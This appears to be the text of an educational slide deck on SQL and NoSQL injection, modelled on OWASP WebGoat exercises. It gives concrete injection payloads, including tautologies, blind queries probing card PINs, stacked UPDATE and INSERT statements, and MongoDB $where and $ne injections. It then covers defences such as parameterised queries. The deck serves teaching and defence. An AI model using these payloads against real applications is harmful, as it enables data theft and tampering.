SQL and NoSQL Injection
Lavanya Mohan
Sailee Bhekare
SQL and NoSQL Injection
Select * from users where user_id = <i/p>
Easy to Exploit
Common
Severe Impact
Techniques for Exploiting
SQL Injection
- Fingerprinting the DB
- String SQL Injection
- Numeric SQL Injection
- Blind Numeric Injection
- Blind String Injection
Fingerprinting the DB
String SQL Injection
Select * from user_data where last_name = ' Smith '
Smith' OR '1'='1
Select * from user_data
where last_name = ' Smith' OR '1'='1 '
Numeric SQL Injection
Select * from weather_data where station =
101 OR 1=1
Blind Numeric SQL Injection
101 AND ((Select pin from pins
where
cc_number
='1111222233334444')>2500)
Blind String SQL Injection
101 AND((Select name from pins
where
cc_number
='4321432143214321')>'E');
More on SQL Injection
- Update
- Insert
Update
Select * from SALARIES where USERID = '
jsmith
'
jsmith'; Update SALARIES
SET SALARY='50000' where USERID='jsmith
Insert
Select * from SALARIES where USERID = '
jsmith
'
jsmith'; Insert into SALARIES
VALUES ('hpotter','10000000')
;--
Is
No SQL = No Injections??
Example Of MongoDB NoSQL Injection
Typical User Form:
db.characters.find({"name" : "Robb"})
Example 1 :
db.characters.find( { name : 'Robb
', $where: 'function() { sleep(5000);
return this.name=="Robb"}
'})
Example 2 :
Using String Manipulation
db.characters.find({name:'abd
', name:{$ne: 'Robb'} ,address:'Casterly Rock
'})
Parameterised Queries
SQL
NoSQL
Input Validation
Use Appropriate Privileges
Proper Error Messages
References
- https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OWASP-DV-005)#Standard_SQL_Injection_Testing
- https://www.owasp.org/index.php?title=Testing_for_NoSQL_injection&setlang=en
- https://github.com/shirish4you/NoSQLInjectionDemo
- https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
- http://www.syhunt.com/?n=Articles.NoSQLInjection
- https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
SQL and NoSQL Injection
By Lavanya Mohan
